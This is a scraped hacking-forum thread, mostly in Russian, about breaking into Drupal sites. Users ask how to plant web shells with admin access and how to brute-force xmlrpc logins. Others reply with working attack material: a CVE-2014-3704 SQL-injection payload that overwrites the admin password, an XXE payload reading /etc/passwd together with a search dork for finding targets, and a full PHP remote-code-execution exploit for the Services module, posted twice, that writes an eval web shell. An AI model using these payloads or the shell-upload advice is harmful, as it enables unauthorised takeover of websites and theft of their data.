подскажите как залить шелл в вот эту версию Drupal 6.22 доступ админки есть стандартные способы не помогли
CVE-2014-3704 Drupal 7.0 – 7.31 pre-auth SQL Injection Vulnerability lol https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html Code: SektionEins GmbH www.sektioneins.de -= Security Advisory =- Advisory: Drupal - pre-auth SQL Injection Vulnerability Release Date: 2014/10/15 Last Modified: 2014/10/15 Author: Stefan Horst [stefan.horst[at]sektioneins.de] Application: Drupal >= 7.0 <= 7.31 Severity: Full SQL injection, which results in total control and code execution of Website. Risk: Highly Critical Vendor Status: Drupal 7.32 fixed this bug Reference: http://www.sektioneins.com/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html Overview: Quote from http://www.drupal.org "Come for the software, stay for the community Drupal is an open source content management platform powering millions of websites and applications. It’s built, used, and supported by an active and diverse community of people around the world." During a code audit of Drupal extensions for a customer an SQL Injection was found in the way the Drupal core handles prepared statements. A malicious user can inject arbitrary SQL queries. And thereby control the complete Drupal site. This leads to a code execution as well. This vulnerability can be exploited by remote attackers without any kind of authentication required. Details: Drupal uses prepared statements in all its SQL queries. To handle IN statements there is an expandArguments function to expand arrays. protected function expandArguments(&$query, &$args) { $modified = FALSE; // If the placeholder value to insert is an array, assume that we need // to expand it out into a comma-delimited set of placeholders. foreach (array_filter($args, 'is_array') as $key => $data) { $new_keys = array(); foreach ($data as $i => $value) { // This assumes that there are no other placeholders that use the same // name. For example, if the array placeholder is defined as :example // and there is already an :example_2 placeholder, this will generate // a duplicate key. We do not account for that as the calling code // is already broken if that happens. $new_keys[$key . '_' . $i] = $value; } // Update the query with the new placeholders. // preg_replace is necessary to ensure the replacement does not affect // placeholders that start with the same exact text. For example, if the // query contains the placeholders :foo and :foobar, and :foo has an // array of values, using str_replace would affect both placeholders, // but using the following preg_replace would only affect :foo because // it is followed by a non-word character. $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query); // Update the args array with the new placeholders. unset($args[$key]); $args += $new_keys; $modified = TRUE; } return $modified; } The function assumes that it is called with an array which has no keys. Example: db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('user1','user2'))); Which results in this SQL Statement SELECT * from users where name IN (:name_0, :name_1) with the parameters name_0 = user1 and name_1 = user2. The Problem occurs, if the array has keys, which are no integers. Example: db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('test -- ' => 'user1','test' => 'user2'))); this results in an exploitable SQL query: SELECT * FROM users WHERE name = :name_test -- , :name_test AND status = 1 with parameters :name_test = user2. Since Drupal uses PDO, multi-queries are allowed. So this SQL Injection can be used to insert arbitrary data in the database, dump or modify existing data or drop the whole database. With the possibility to INSERT arbitrary data into the database an attacker can execute any PHP code through Drupal features with callbacks. Patch: $new_keys = array(); foreach (array_values($data) as $i => $value) { // This assumes that there are no other placeholders that use the same // name. For example, if the array placeholder is defined as :example // and there is already an :example_2 placeholder, this will generate // a duplicate key. We do not account for that as the calling code // is already broken if that happens. $new_keys[$key . '_' . $i] = $value; } Proof of Concept: SektionEins GmbH has developed a proof of concept, but was asked by Drupal to postpone the release. Disclosure Timeline: 16. Sep. 2014 - Notified the Drupal devs via security contact form 15. Okt. 2014 - Relase of Bugfix by Drupal core Developers poc: Code: name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in и работает ведь вперед хэкеры exploit: http://pastebin.com/nDwLFV3v video: http://www.youtube.com/watch?v=rHwJYD_yTlM
Drupal 7.34 Admin PHP Object Injection https://websec.wordpress.com/2015/01/09/drupal-7-34-admin-php-object-injection/
Open redirect и обход авторизации. В плане эксплуатации имеются серьезные ограничения. https://www.drupal.org/SA-CORE-2015-001 Байпас (modules/user/user.module) До PHP: function user_pass_rehash($password, $timestamp, $login) { return md5($timestamp . $password . $login); } После PHP: function user_pass_rehash($password, $timestamp, $login, $uid) { // Backwards compatibility: Try to determine a $uid if one was not passed. // (Since $uid is a required parameter to this function, a PHP warning will // be generated if it's not provided, which is an indication that the calling // code should be updated. But the code below will try to generate a correct // hash in the meantime.) if (!isset($uid)) { $uids = array(); $result = db_query_range("SELECT uid FROM {users} WHERE pass = '%s' AND login = '%s' AND uid > 0", $password, $login, 0, 2); while ($row = db_fetch_array($result)) { $uids[] = $row['uid']; } // If exactly one user account matches the provided password and login // timestamp, proceed with that $uid. if (count($uids) == 1) { $uid = reset($uids); } // Otherwise there is no safe hash to return, so return a random string // that will never be treated as a valid token. else { return drupal_random_key(); } } return drupal_hmac_base64($timestamp . $login . $uid, drupal_get_private_key() . $password); } ORed (includes/bootstrap.inc) PHP: // Sanitize the destination parameter (which is often used for redirects) // to prevent open redirect attacks leading to other domains. Sanitize // both $_GET['destination'] and $_REQUEST['destination'] to protect code // that relies on either, but do not sanitize $_POST to avoid interfering // with unrelated form submissions. $_REQUEST['edit']['destination'] is // also sanitized since drupal_goto() will sometimes rely on it, and // other code might therefore use it too. The sanitization happens here // because menu_path_is_external() requires the variable system to be // available. if (isset($_GET['destination']) || isset($_REQUEST['destination']) || isset($_REQUEST['edit']['destination'])) { require_once './includes/menu.inc'; drupal_load('module', 'filter'); // If the destination is an external URL, remove it. if (isset($_GET['destination']) && menu_path_is_external($_GET['destination'])) { unset($_GET['destination']); unset($_REQUEST['destination']); } // If there's still something in $_REQUEST['destination'] that didn't // come from $_GET, check it too. if (isset($_REQUEST['destination']) && (!isset($_GET['destination']) || $_REQUEST['destination'] != $_GET['destination']) && menu_path_is_external($_REQUEST['destination'])) { unset($_REQUEST['destination']); } // Check $_REQUEST['edit']['destination'] separately. if (isset($_REQUEST['edit']['destination']) && menu_path_is_external($_REQUEST['edit']['destination'])) { unset($_REQUEST['edit']['destination']); } }
Pre-auth XXE in Drupal Services module, neat tricks to bypass restrictions inside Подробное описание (PDF): http://www.synacktiv.fr/ressources/synacktiv_drupal_xxe_services.pdf Code: POST /drupal7.28/?q=test/node HTTP/1.1 [...] <!DOCTYPE root [ <!ENTITY % evil SYSTEM "file:///etc/passwd"> %evil; ]> <xml> <test>test</test> </xml> ДОРК: "inurl:sites/all/modules/services/servers/rest_server/"
Всем привет drupal 6.20. Аккаунт с правами администратора Стандартные способы заливки шелла не помогают Кто что ещё подскажет?Что пробовала 1) В модулях включила PHP filter 2) По site/admin/settings/filters/ => Access denied You are not authorized to access this page. А значит, уже не получится включить формат php, и соответственно при добавлении блоков или страниц нельзя выбрать формат php... Этот способ облом 3) Темы загружать не могу 4) есть imce. Загружаю php => переименовывается в php_.txt. Загружаю .php3 => скачивается Загружаю .shtml - нормально открывается, но видна только html'ная часть, php код не исполняется, всё интерпретируется как html. 5) пыталась загрузить опять же через imce .htaccess чтобы не скачивались файлы php3. Но облом, переименовывается в htaccess. В общем, не знаю, что ещё делать Кто что подскажет?
DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE Уязвимость Одной из особенностей модуля является то, что можно управлять форматом ввода / вывода, изменяя заголовки Content-Type / Accept. По умолчанию разрешены следующие форматы ввода: Application / xml Application / json Multipart / form-data Application / vnd.php.serialized Code: POST /drupal-7.54/my_rest_endpoint/user/login HTTP/1.1 Host: vmweb.lan Accept: application/json Content-Type: application/vnd.php.serialized Content-Length: 45 Connection: close a:2:{s:8:"username";s:5:"admin";s:8:"password";s:8:"password";} Code: HTTP/1.1 200 OK Date: Thu, 02 Mar 2017 14:29:54 GMT Server: Apache/2.4.18 (Ubuntu) Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: no-cache, must-revalidate X-Content-Type-Options: nosniff Vary: Accept Set-Cookie: SESSaad41d4de9fd30ccb65f8ea9e4162d52=ufBRP7UJFuQKSf0VuFvwaoB3h4mjVYXbE9K6Y_DGU_I; expires=Sat, 25-Mar-2017 18:03:14 GMT; Max-Age=2000000; path=/; domain=.vmweb.lan; HttpOnly Content-Length: 635 Connection: close Content-Type: application/json {"sessid":"ufBRP7UJFuQKSf0VuFvwaoB3h4mjVYXbE9K6Y_DGU_I","session_name":"SESSaad41d4de9fd30ccb65f8ea9e4162d52","token":"2tFysvDt1POl7jjJJSCRO7sL1rvlrnqtrik6gljggo4","user":{"uid":"1","name":"admin","mail":"[email protected]","theme":"","signature":"","signature_format":null,"created":"1487348324","access":"1488464867","login":1488464994,"status":"1","timezone":"Europe/Berlin","language":"","picture":null,"init":"[email protected]","data":false,"roles":{"2":"authenticated user","3":"administrator"},"rdf_mapping":{"rdftype":["sioc:UserAccount"],"name":{"predicates":["foaf:name"]},"homepage":{"predicates":["foaf:page"],"type":"rel"}}}} Exploit: PHP: #!/usr/bin/php <?php# Drupal Services Module Remote Code Execution Exploit # https://www.ambionics.io/blog/drupal-services-module-rce # cf # # Three stages: # 1. Use the SQL Injection to get the contents of the cache for current endpoint # along with admin credentials and hash # 2. Alter the cache to allow us to write a file and do so # 3. Restore the cache # # Initialization error_reporting(E_ALL); define('QID', 'anything');define('TYPE_PHP', 'application/vnd.php.serialized');define('TYPE_JSON', 'application/json');define('CONTROLLER', 'user');define('ACTION', 'login'); $url = 'http://vmweb.lan/drupal-7.54';$endpoint_path = '/rest_endpoint';$endpoint = 'rest_endpoint'; $file = [ 'filename' => 'dixuSOspsOUU.php', 'data' => '<?php eval(file_get_contents(\'php://input\')); ?>']; $browser = new Browser($url . $endpoint_path); # Stage 1: SQL Injection class DatabaseCondition{ protected $conditions = [ "#conjunction" => "AND" ]; protected $arguments = []; protected $changed = false; protected $queryPlaceholderIdentifier = null; public $stringVersion = null; public function __construct($stringVersion=null) { $this->stringVersion = $stringVersion; if(!isset($stringVersion)) { $this->changed = true; $this->stringVersion = null; } } } class SelectQueryExtender { # Contains a DatabaseCondition object instead of a SelectQueryInterface # so that $query->compile() exists and (string) $query is controlled by us. protected $query = null; protected $uniqueIdentifier = QID; protected $connection; protected $placeholder = 0; public function __construct($sql) { $this->query = new DatabaseCondition($sql); } } $cache_id = "services:$endpoint:resources";$sql_cache = "SELECT data FROM {cache} WHERE cid='$cache_id'";$password_hash = '$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd'; # Take first user but with a custom password # Store the original password hash in signature_format, and endpoint cache # in signature$query = "0x3a) UNION SELECT ux.uid AS uid, " . "ux.name AS name, '$password_hash' AS pass, " . "ux.mail AS mail, ux.theme AS theme, ($sql_cache) AS signature, " . "ux.pass AS signature_format, ux.created AS created, " . "ux.access AS access, ux.login AS login, ux.status AS status, " . "ux.timezone AS timezone, ux.language AS language, ux.picture " . "AS picture, ux.init AS init, ux.data AS data FROM {users} ux " . "WHERE ux.uid<>(0"; $query = new SelectQueryExtender($query);$data = ['username' => $query, 'password' => 'ouvreboite'];$data = serialize($data); $json = $browser->post(TYPE_PHP, $data); # If this worked, the rest will as wellif(!isset($json->user)) { print_r($json); e("Failed to login with fake password"); } # Store session and user data $session = [ 'session_name' => $json->session_name, 'session_id' => $json->sessid, 'token' => $json->token];store('session', $session); $user = $json->user; # Unserialize the cached value # Note: Drupal websites admins, this is your opportunity to fight back :)$cache = unserialize($user->signature); # Reassign fields$user->pass = $user->signature_format; unset($user->signature); unset($user->signature_format); store('user', $user); if($cache === false) { e("Unable to obtains endpoint's cache value"); } x("Cache contains " . sizeof($cache) . " entries"); # Stage 2: Change endpoint's behaviour to write a shell class DrupalCacheArray{ # Cache ID protected $cid = "services:endpoint_name:resources"; # Name of the table to fetch data from. # Can also be used to SQL inject in DrupalDatabaseCache::getMultiple() protected $bin = 'cache'; protected $keysToPersist = []; protected $storage = []; function __construct($storage, $endpoint, $controller, $action) { $settings = [ 'services' => ['resource_api_version' => '1.0'] ]; $this->cid = "services:$endpoint:resources"; # If no endpoint is given, just reset the original values if(isset($controller)) { $storage[$controller]['actions'][$action] = [ 'help' => 'Writes data to a file', # Callback function 'callback' => 'file_put_contents', # This one does not accept "true" as Drupal does, # so we just go for a tautology 'access callback' => 'is_string', 'access arguments' => ['a string'], # Arguments given through POST 'args' => [ 0 => [ 'name' => 'filename', 'type' => 'string', 'description' => 'Path to the file', 'source' => ['data' => 'filename'], 'optional' => false, ], 1 => [ 'name' => 'data', 'type' => 'string', 'description' => 'The data to write', 'source' => ['data' => 'data'], 'optional' => false, ], ], 'file' => [ 'type' => 'inc', 'module' => 'services', 'name' => 'resources/user_resource', ], 'endpoint' => $settings ]; $storage[$controller]['endpoint']['actions'] += [ $action => [ 'enabled' => 1, 'settings' => $settings ] ]; } $this->storage = $storage; $this->keysToPersist = array_fill_keys(array_keys($storage), true); } } class ThemeRegistry Extends DrupalCacheArray { protected $persistable; protected $completeRegistry; } cache_poison($endpoint, $cache); # Write the file$json = (array) $browser->post(TYPE_JSON, json_encode($file)); # Stage 3: Restore endpoint's behaviour cache_reset($endpoint, $cache); if(!(isset($json[0]) && $json[0] === strlen($file['data']))) { e("Failed to write file."); } $file_url = $url . '/' . $file['filename'];x("File written: $file_url"); # HTTP Browser class Browser{ private $url; private $controller = CONTROLLER; private $action = ACTION; function __construct($url) { $this->url = $url; } function post($type, $data) { $headers = [ "Accept: " . TYPE_JSON, "Content-Type: $type", "Content-Length: " . strlen($data) ]; $url = $this->url . '/' . $this->controller . '/' . $this->action; $s = curl_init(); curl_setopt($s, CURLOPT_URL, $url); curl_setopt($s, CURLOPT_HTTPHEADER, $headers); curl_setopt($s, CURLOPT_POST, 1); curl_setopt($s, CURLOPT_POSTFIELDS, $data); curl_setopt($s, CURLOPT_RETURNTRANSFER, true); curl_setopt($s, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($s, CURLOPT_SSL_VERIFYPEER, 0); $output = curl_exec($s); $error = curl_error($s); curl_close($s); if($error) { e("cURL: $error"); } return json_decode($output); } } # Cache function cache_poison($endpoint, $cache) { $tr = new ThemeRegistry($cache, $endpoint, CONTROLLER, ACTION); cache_edit($tr); } function cache_reset($endpoint, $cache) { $tr = new ThemeRegistry($cache, $endpoint, null, null); cache_edit($tr); } function cache_edit($tr) { global $browser; $data = serialize([$tr]); $json = $browser->post(TYPE_PHP, $data); } # Utils function x($message) { print("$message\n"); } function e($message) { x($message); exit(1); } function store($name, $data) { $filename = "$name.json"; file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT)); x("Stored $name information in $filename"); } Всем срочно обновляться =) Источник : Здесь
Drupal 7.x Services Module Remote Code Execution Code: #!/usr/bin/php <?php # Drupal Services Module Remote Code Execution Exploit # https://www.ambionics.io/blog/drupal-services-module-rce # cf # # Three stages: # 1. Use the SQL Injection to get the contents of the cache for current endpoint # along with admin credentials and hash # 2. Alter the cache to allow us to write a file and do so # 3. Restore the cache # # Initialization error_reporting(E_ALL); define(''QID'', ''anything''); define(''TYPE_PHP'', ''application/vnd.php.serialized''); define(''TYPE_JSON'', ''application/json''); define(''CONTROLLER'', ''user''); define(''ACTION'', ''login''); $url = ''http://vmweb.lan/drupal-7.54''; $endpoint_path = ''/rest_endpoint''; $endpoint = ''rest_endpoint''; $file = [ ''filename'' => ''dixuSOspsOUU.php'', ''data'' => ''<?php eval(file_get_contents(\''php://input\'')); ?>'' ]; $browser = new Browser($url . $endpoint_path); # Stage 1: SQL Injection class DatabaseCondition { protected $conditions = [ "#conjunction" => "AND" ]; protected $arguments = []; protected $changed = false; protected $queryPlaceholderIdentifier = null; public $stringVersion = null; public function __construct($stringVersion=null) { $this->stringVersion = $stringVersion; if(!isset($stringVersion)) { $this->changed = true; $this->stringVersion = null; } } } class SelectQueryExtender { # Contains a DatabaseCondition object instead of a SelectQueryInterface # so that $query->compile() exists and (string) $query is controlled by us. protected $query = null; protected $uniqueIdentifier = QID; protected $connection; protected $placeholder = 0; public function __construct($sql) { $this->query = new DatabaseCondition($sql); } } $cache_id = "services:$endpoint:resources"; $sql_cache = "SELECT data FROM {cache} WHERE cid=''$cache_id''"; $password_hash = ''$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd''; # Take first user but with a custom password # Store the original password hash in signature_format, and endpoint cache # in signature $query = "0x3a) UNION SELECT ux.uid AS uid, " . "ux.name AS name, ''$password_hash'' AS pass, " . "ux.mail AS mail, ux.theme AS theme, ($sql_cache) AS signature, " . "ux.pass AS signature_format, ux.created AS created, " . "ux.access AS access, ux.login AS login, ux.status AS status, " . "ux.timezone AS timezone, ux.language AS language, ux.picture " . "AS picture, ux.init AS init, ux.data AS data FROM {users} ux " . "WHERE ux.uid<>(0" ; $query = new SelectQueryExtender($query); $data = [''username'' => $query, ''password'' => ''ouvreboite'']; $data = serialize($data); $json = $browser->post(TYPE_PHP, $data); # If this worked, the rest will as well if(!isset($json->user)) { print_r($json); e("Failed to login with fake password"); } # Store session and user data $session = [ ''session_name'' => $json->session_name, ''session_id'' => $json->sessid, ''token'' => $json->token ]; store(''session'', $session); $user = $json->user; # Unserialize the cached value # Note: Drupal websites admins, this is your opportunity to fight back :) $cache = unserialize($user->signature); # Reassign fields $user->pass = $user->signature_format; unset($user->signature); unset($user->signature_format); store(''user'', $user); if($cache === false) { e("Unable to obtains endpoint''s cache value"); } x("Cache contains " . sizeof($cache) . " entries"); # Stage 2: Change endpoint''s behaviour to write a shell class DrupalCacheArray { # Cache ID protected $cid = "services:endpoint_name:resources"; # Name of the table to fetch data from. # Can also be used to SQL inject in DrupalDatabaseCache::getMultiple() protected $bin = ''cache''; protected $keysToPersist = []; protected $storage = []; function __construct($storage, $endpoint, $controller, $action) { $settings = [ ''services'' => [''resource_api_version'' => ''1.0''] ]; $this->cid = "services:$endpoint:resources"; # If no endpoint is given, just reset the original values if(isset($controller)) { $storage[$controller][''actions''][$action] = [ ''help'' => ''Writes data to a file'', # Callback function ''callback'' => ''file_put_contents'', # This one does not accept "true" as Drupal does, # so we just go for a tautology ''access callback'' => ''is_string'', ''access arguments'' => [''a string''], # Arguments given through POST ''args'' => [ 0 => [ ''name'' => ''filename'', ''type'' => ''string'', ''description'' => ''Path to the file'', ''source'' => [''data'' => ''filename''], ''optional'' => false, ], 1 => [ ''name'' => ''data'', ''type'' => ''string'', ''description'' => ''The data to write'', ''source'' => [''data'' => ''data''], ''optional'' => false, ], ], ''file'' => [ ''type'' => ''inc'', ''module'' => ''services'', ''name'' => ''resources/user_resource'', ], ''endpoint'' => $settings ]; $storage[$controller][''endpoint''][''actions''] += [ $action => [ ''enabled'' => 1, ''settings'' => $settings ] ]; } $this->storage = $storage; $this->keysToPersist = array_fill_keys(array_keys($storage), true); } } class ThemeRegistry Extends DrupalCacheArray { protected $persistable; protected $completeRegistry; } cache_poison($endpoint, $cache); # Write the file $json = (array) $browser->post(TYPE_JSON, json_encode($file)); # Stage 3: Restore endpoint''s behaviour cache_reset($endpoint, $cache); if(!(isset($json[0]) && $json[0] === strlen($file[''data'']))) { e("Failed to write file."); } $file_url = $url . ''/'' . $file[''filename'']; x("File written: $file_url"); # HTTP Browser class Browser { private $url; private $controller = CONTROLLER; private $action = ACTION; function __construct($url) { $this->url = $url; } function post($type, $data) { $headers = [ "Accept: " . TYPE_JSON, "Content-Type: $type", "Content-Length: " . strlen($data) ]; $url = $this->url . ''/'' . $this->controller . ''/'' . $this->action; $s = curl_init(); curl_setopt($s, CURLOPT_URL, $url); curl_setopt($s, CURLOPT_HTTPHEADER, $headers); curl_setopt($s, CURLOPT_POST, 1); curl_setopt($s, CURLOPT_POSTFIELDS, $data); curl_setopt($s, CURLOPT_RETURNTRANSFER, true); curl_setopt($s, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($s, CURLOPT_SSL_VERIFYPEER, 0); $output = curl_exec($s); $error = curl_error($s); curl_close($s); if($error) { e("cURL: $error"); } return json_decode($output); } } # Cache function cache_poison($endpoint, $cache) { $tr = new ThemeRegistry($cache, $endpoint, CONTROLLER, ACTION); cache_edit($tr); } function cache_reset($endpoint, $cache) { $tr = new ThemeRegistry($cache, $endpoint, null, null); cache_edit($tr); } function cache_edit($tr) { global $browser; $data = serialize([$tr]); $json = $browser->post(TYPE_PHP, $data); } # Utils function x($message) { print("$message\n"); } function e($message) { x($message); exit(1); } function store($name, $data) { $filename = "$name.json"; file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT)); x("Stored $name information in $filename"); }
[Quote = "leokomaro, de la publicación: 4079266, miembro de: 302606"] alguien puede ayudar con un 6,22 sobre una base reembolsable [/ quote]? https://cxsecurity.com/issue/WLB-2016070020 alguien sabe otra vulnerabilidad a 6.22?
Пацаны, Drupal 6.28, 2013-01-16 ---------------------- - Fixed security issues (multiple vulnerabilities), see SA-CORE-2013-001. реально ли это взломать?
Подскажите, возможен в друпале xmlrpc брут? в wp все предельно просто, делаешь xml Запрос с параметрами и все работает, а какие параметры у друпала? информация в сети очень древняя. Если это реально, можно пример?
